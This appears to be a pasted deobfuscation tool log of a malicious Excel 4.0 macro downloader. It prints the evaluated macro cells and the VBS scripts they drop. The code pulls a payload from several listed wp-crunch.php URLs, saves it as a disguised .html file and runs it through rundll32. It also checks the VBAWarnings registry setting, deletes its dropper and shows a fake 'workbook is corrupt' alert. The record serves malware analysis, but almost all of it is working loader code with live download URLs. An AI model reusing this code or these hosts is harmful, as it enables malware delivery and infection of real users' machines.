- CELL:BJ56397 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
- CELL:BJ56398 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56399 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56400 , FullEvaluation , IF(R56398C62<40000,,GOTO(R56411C62))
- CELL:BJ56401 , FullEvaluation , "https://gurukal.in/wp-crunch.php"
- CELL:BJ56402 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://gurukal.in/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56403 , PartialEvaluation , FILES("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56404 , FullBranching , IF(ISERROR(R56403C62),GOTO(R56410C62),)
- CELL:BJ56404 , FullEvaluation , [FALSE]
- CELL:BJ56405 , FullEvaluation , FOPEN("C:\Users\Public\OwP8Hxu4.html",1)
- CELL:BJ56406 , PartialEvaluation , FSIZE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56407 , PartialEvaluation , FCLOSE("C:\Users\Public\OwP8Hxu4.html")
- CELL:BJ56408 , FullEvaluation , IF(R56406C62<40000,,GOTO(R56411C62))
- CELL:BJ56409 , FullEvaluation , "https://indoeducation.com/wp-crunch.php"
- CELL:BJ56410 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://indoeducation.com/wp-crunch.php","C:\Users\Public\OwP8Hxu4.html",0,0)
- CELL:BJ56411 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BJ56412 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:FL18287 , FullEvaluation , [FALSE] GOTO(R23779C121)
- CELL:DQ23779 , FullEvaluation , "=""C:\Users\Public\mWwd6De.html"""
- CELL:DQ23780 , FullEvaluation , "=""C:\Users\Public\M737Q.vbs"""
- CELL:DQ23781 , FullEvaluation , "=FOPEN(R45257C10,3)"
- CELL:DQ23782 , FullEvaluation , "=FWRITELN(R45258C10,""hquS = """"https://estudiolacazezancarini.com/wp-crunch.php"""""")"
- CELL:DQ23783 , FullEvaluation , "=FWRITELN(R45258C10,""fpiT = """"https://germdisruptor.com/wp-crunch.php"""""")"
- CELL:DQ23784 , FullEvaluation , "=FWRITELN(R45258C10,""fSRoqzx = """"https://gurukal.in/wp-crunch.php"""""")"
- CELL:DQ23785 , FullEvaluation , "=FWRITELN(R45258C10,""jP5 = """"https://indoeducation.com/wp-crunch.php"""""")"
- CELL:DQ23786 , FullEvaluation , "=FWRITELN(R45258C10,""hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)"")"
- CELL:DQ23787 , FullEvaluation , "=FWRITELN(R45258C10,""Dim kNV: Set kNV = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
- CELL:DQ23788 , FullEvaluation , "=FWRITELN(R45258C10,""Function eHMCbJ(data):"")"
- CELL:DQ23789 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.setOption(2) = 13056"")"
- CELL:DQ23790 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.Open """"GET"""", data, False"")"
- CELL:DQ23791 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
- CELL:DQ23792 , FullEvaluation , "=FWRITELN(R45258C10,""kNV.Send"")"
- CELL:DQ23793 , FullEvaluation , "=FWRITELN(R45258C10,""eHMCbJ = kNV.Status"")"
- CELL:DQ23794 , FullEvaluation , "=FWRITELN(R45258C10,""End Function"")"
- CELL:DQ23795 , FullEvaluation , "=FWRITELN(R45258C10,""For Each qXtq in hoxLrA"")"
- CELL:DQ23796 , FullEvaluation , "=FWRITELN(R45258C10,""If eHMCbJ(qXtq) = 200 Then"")"
- CELL:DQ23797 , FullEvaluation , "=FWRITELN(R45258C10,""Dim woOQbQ0: Set woOQbQ0 = CreateObject(""""ADODB.Stream"""")"")"
- CELL:DQ23798 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Open"")"
- CELL:DQ23799 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Type = 1"")"
- CELL:DQ23800 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Write kNV.ResponseBody"")"
- CELL:DQ23801 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.SaveToFile """"""&R45256C10&"""""", 2"")"
- CELL:DQ23802 , FullEvaluation , "=FWRITELN(R45258C10,""woOQbQ0.Close"")"
- CELL:DQ23803 , FullEvaluation , "=FWRITELN(R45258C10,""Exit For"")"
- CELL:DQ23804 , FullEvaluation , "=FWRITELN(R45258C10,""End If"")"
- CELL:DQ23805 , FullEvaluation , "=FWRITELN(R45258C10,""Next"")"
- CELL:DQ23806 , FullEvaluation , "=FCLOSE(R45258C10)"
- CELL:DQ23807 , FullEvaluation , "=EXEC(""explorer.exe ""&R45257C10&"""")"
- CELL:DQ23808 , FullEvaluation , "=WHILE(ISERROR(FILES(R45256C10)))"
- CELL:DQ23809 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:DQ23810 , FullEvaluation , "=NEXT()"
- CELL:DQ23811 , FullEvaluation , "=FILE.DELETE(R45257C10)"
- CELL:DQ23812 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
- CELL:DQ23813 , FullEvaluation , "=""C:\Users\Public\Bmk.vbs"""
- CELL:DQ23814 , FullEvaluation , "=FOPEN(R45290C10,3)"
- CELL:DQ23815 , FullEvaluation , "=""rundll32.exe"""
- CELL:DQ23816 , FullEvaluation , "=R45256C10&"",DllRegisterServer"""
- CELL:DQ23817 , FullEvaluation , "=""C:\Windows\System32"""
- CELL:DQ23818 , FullEvaluation , "=FWRITELN(R45291C10,""Set RSHCGfB5 = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
- CELL:DQ23819 , FullEvaluation , "=FWRITELN(R45291C10,""RSHCGfB5.Document.Application.ShellExecute """"""&R45292C10&"""""",""""""&R45293C10&"""""",""""""&R45294C10&"""""",Null,0"")"
- CELL:DQ23820 , FullEvaluation , "=FCLOSE(R45291C10)"
- CELL:DQ23821 , FullEvaluation , "=EXEC(""explorer.exe ""&R45290C10&"""")"
- CELL:DQ23822 , FullEvaluation , "=GOTO(R18256C168)"
- CELL:DQ23823 , FullEvaluation , ON.TIME(2020-06-26 11:40:53.355704,'VyNand2egLwRTDtMIW'!AV40173)
- CELL:AV40173 , FullEvaluation , FORMULA("=FORMULA(R[-16395]C[73],R[5082]C[-38])",VyNand2egLwRTDtMIW$AV$40174:$AV$40217)
- CELL:AV40174 , FullEvaluation , FORMULA("=""C:\Users\Public\mWwd6De.html""",R[5082]C[-38])
- CELL:AV40175 , FullEvaluation , FORMULA("=""C:\Users\Public\M737Q.vbs""",R[5082]C[-38])
- CELL:AV40176 , FullEvaluation , FORMULA("=FOPEN(R45257C10,3)",R[5082]C[-38])
- CELL:AV40177 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""hquS = """"https://estudiolacazezancarini.com/wp-crunch.php"""""")",R[5082]C[-38])
- CELL:AV40178 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""fpiT = """"https://germdisruptor.com/wp-crunch.php"""""")",R[5082]C[-38])
- CELL:AV40179 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""fSRoqzx = """"https://gurukal.in/wp-crunch.php"""""")",R[5082]C[-38])
- CELL:AV40180 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""jP5 = """"https://indoeducation.com/wp-crunch.php"""""")",R[5082]C[-38])
- CELL:AV40181 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)"")",R[5082]C[-38])
- CELL:AV40182 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Dim kNV: Set kNV = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[5082]C[-38])
- CELL:AV40183 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Function eHMCbJ(data):"")",R[5082]C[-38])
- CELL:AV40184 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.setOption(2) = 13056"")",R[5082]C[-38])
- CELL:AV40185 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.Open """"GET"""", data, False"")",R[5082]C[-38])
- CELL:AV40186 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[5082]C[-38])
- CELL:AV40187 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""kNV.Send"")",R[5082]C[-38])
- CELL:AV40188 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""eHMCbJ = kNV.Status"")",R[5082]C[-38])
- CELL:AV40189 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""End Function"")",R[5082]C[-38])
- CELL:AV40190 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""For Each qXtq in hoxLrA"")",R[5082]C[-38])
- CELL:AV40191 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""If eHMCbJ(qXtq) = 200 Then"")",R[5082]C[-38])
- CELL:AV40192 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Dim woOQbQ0: Set woOQbQ0 = CreateObject(""""ADODB.Stream"""")"")",R[5082]C[-38])
- CELL:AV40193 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Open"")",R[5082]C[-38])
- CELL:AV40194 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Type = 1"")",R[5082]C[-38])
- CELL:AV40195 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Write kNV.ResponseBody"")",R[5082]C[-38])
- CELL:AV40196 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.SaveToFile """"""&R45256C10&"""""", 2"")",R[5082]C[-38])
- CELL:AV40197 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""woOQbQ0.Close"")",R[5082]C[-38])
- CELL:AV40198 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Exit For"")",R[5082]C[-38])
- CELL:AV40199 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""End If"")",R[5082]C[-38])
- CELL:AV40200 , FullEvaluation , FORMULA("=FWRITELN(R45258C10,""Next"")",R[5082]C[-38])
- CELL:AV40201 , FullEvaluation , FORMULA("=FCLOSE(R45258C10)",R[5082]C[-38])
- CELL:AV40202 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R45257C10&"""")",R[5082]C[-38])
- CELL:AV40203 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R45256C10)))",R[5082]C[-38])
- CELL:AV40204 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[5082]C[-38])
- CELL:AV40205 , FullEvaluation , FORMULA("=NEXT()",R[5082]C[-38])
- CELL:AV40206 , FullEvaluation , FORMULA("=FILE.DELETE(R45257C10)",R[5082]C[-38])
- CELL:AV40207 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[5082]C[-38])
- CELL:AV40208 , FullEvaluation , FORMULA("=""C:\Users\Public\Bmk.vbs""",R[5082]C[-38])
- CELL:AV40209 , FullEvaluation , FORMULA("=FOPEN(R45290C10,3)",R[5082]C[-38])
- CELL:AV40210 , FullEvaluation , FORMULA("=""rundll32.exe""",R[5082]C[-38])
- CELL:AV40211 , FullEvaluation , FORMULA("=R45256C10&"",DllRegisterServer""",R[5082]C[-38])
- CELL:AV40212 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[5082]C[-38])
- CELL:AV40213 , FullEvaluation , FORMULA("=FWRITELN(R45291C10,""Set RSHCGfB5 = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[5082]C[-38])
- CELL:AV40214 , FullEvaluation , FORMULA("=FWRITELN(R45291C10,""RSHCGfB5.Document.Application.ShellExecute """"""&R45292C10&"""""",""""""&R45293C10&"""""",""""""&R45294C10&"""""",Null,0"")",R[5082]C[-38])
- CELL:AV40215 , FullEvaluation , FORMULA("=FCLOSE(R45291C10)",R[5082]C[-38])
- CELL:AV40216 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R45290C10&"""")",R[5082]C[-38])
- CELL:AV40217 , FullEvaluation , FORMULA("=GOTO(R18256C168)",R[5082]C[-38])
- CELL:AV40218 , FullEvaluation , ON.TIME(2020-06-26 11:40:53.394678,'VyNand2egLwRTDtMIW'!J45256)
- CELL:J45256 , FullEvaluation , "C:\Users\Public\mWwd6De.html"
- CELL:J45257 , FullEvaluation , "C:\Users\Public\M737Q.vbs"
- CELL:J45258 , FullEvaluation , FOPEN("C:\Users\Public\M737Q.vbs",3)
- CELL:J45259 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","hquS = ""https://estudiolacazezancarini.com/wp-crunch.php""")
- CELL:J45260 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","fpiT = ""https://germdisruptor.com/wp-crunch.php""")
- CELL:J45261 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","fSRoqzx = ""https://gurukal.in/wp-crunch.php""")
- CELL:J45262 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","jP5 = ""https://indoeducation.com/wp-crunch.php""")
- CELL:J45263 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)")
- CELL:J45264 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Dim kNV: Set kNV = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
- CELL:J45265 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Function eHMCbJ(data):")
- CELL:J45266 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.setOption(2) = 13056")
- CELL:J45267 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.Open ""GET"", data, False")
- CELL:J45268 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
- CELL:J45269 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","kNV.Send")
- CELL:J45270 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","eHMCbJ = kNV.Status")
- CELL:J45271 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","End Function")
- CELL:J45272 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","For Each qXtq in hoxLrA")
- CELL:J45273 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","If eHMCbJ(qXtq) = 200 Then")
- CELL:J45274 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Dim woOQbQ0: Set woOQbQ0 = CreateObject(""ADODB.Stream"")")
- CELL:J45275 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Open")
- CELL:J45276 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Type = 1")
- CELL:J45277 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Write kNV.ResponseBody")
- CELL:J45278 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.SaveToFile ""C:\Users\Public\mWwd6De.html"", 2")
- CELL:J45279 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","woOQbQ0.Close")
- CELL:J45280 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Exit For")
- CELL:J45281 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","End If")
- CELL:J45282 , FullEvaluation , FWRITE("C:\Users\Public\M737Q.vbs","Next")
- CELL:J45283 , PartialEvaluation , FCLOSE("C:\Users\Public\M737Q.vbs")
- CELL:J45284 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\M737Q.vbs")
- CELL:J45285 , PartialEvaluation , WHILE(ISERROR(FILES(R45256C10)))
- CELL:J45288 , PartialEvaluation , FILE.DELETE("C:\Users\Public\M737Q.vbs")
- CELL:J45289 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
- CELL:J45290 , FullEvaluation , "C:\Users\Public\Bmk.vbs"
- CELL:J45291 , FullEvaluation , FOPEN("C:\Users\Public\Bmk.vbs",3)
- CELL:J45292 , FullEvaluation , "rundll32.exe"
- CELL:J45293 , FullEvaluation , "C:\Users\Public\mWwd6De.html,DllRegisterServer"
- CELL:J45294 , FullEvaluation , "C:\Windows\System32"
- CELL:J45295 , FullEvaluation , FWRITE("C:\Users\Public\Bmk.vbs","Set RSHCGfB5 = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
- CELL:J45296 , FullEvaluation , FWRITE("C:\Users\Public\Bmk.vbs","RSHCGfB5.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\mWwd6De.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
- CELL:J45297 , PartialEvaluation , FCLOSE("C:\Users\Public\Bmk.vbs")
- CELL:J45298 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Bmk.vbs")
- CELL:J45299 , FullEvaluation , GOTO(R18256C168)
- CELL:FL18256 , End , CLOSE(FALSE)
- CELL:FL18266 , FullEvaluation , [FALSE] GOTO(R18256C168)
- CELL:FL18256 , End , CLOSE(FALSE)
- Files:
- Files: path C:\Users\Public\qyUV.vbs, access 3
- On Error Resume Next
- Set VFYjmh = CreateObject("WScript.Shell")
- Set Yt1jI = CreateObject("Scripting.FileSystemObject")
- Set BIj = Yt1jI.CreateTextFile("C:\Users\Public\gzGD.txt", True)
- BIj.WriteLine(VFYjmh.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
- BIj.Close
- Files: path C:\Users\Public\M737Q.vbs, access 3
- hquS = "https://estudiolacazezancarini.com/wp-crunch.php"
- fpiT = "https://germdisruptor.com/wp-crunch.php"
- fSRoqzx = "https://gurukal.in/wp-crunch.php"
- jP5 = "https://indoeducation.com/wp-crunch.php"
- hoxLrA = Array(hquS,fpiT,fSRoqzx,jP5)
- Dim kNV: Set kNV = CreateObject("MSXML2.ServerXMLHTTP.6.0")
- Function eHMCbJ(data):
- kNV.setOption(2) = 13056
- kNV.Open "GET", data, False
- kNV.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- kNV.Send
- eHMCbJ = kNV.Status
- End Function
- For Each qXtq in hoxLrA
- If eHMCbJ(qXtq) = 200 Then
- Dim woOQbQ0: Set woOQbQ0 = CreateObject("ADODB.Stream")
- woOQbQ0.Open
- woOQbQ0.Type = 1
- woOQbQ0.Write kNV.ResponseBody
- woOQbQ0.SaveToFile "C:\Users\Public\mWwd6De.html", 2
- woOQbQ0.Close
- Exit For
- End If
- Next
- Files: path C:\Users\Public\Bmk.vbs, access 3
- Set RSHCGfB5 = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
- RSHCGfB5.Document.Application.ShellExecute "rundll32.exe","C:\Users\Public\mWwd6De.html,DllRegisterServer","C:\Windows\System32",Null,0
- [END of Deobfuscation]
- time elapsed: 5.384254693984985
- Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement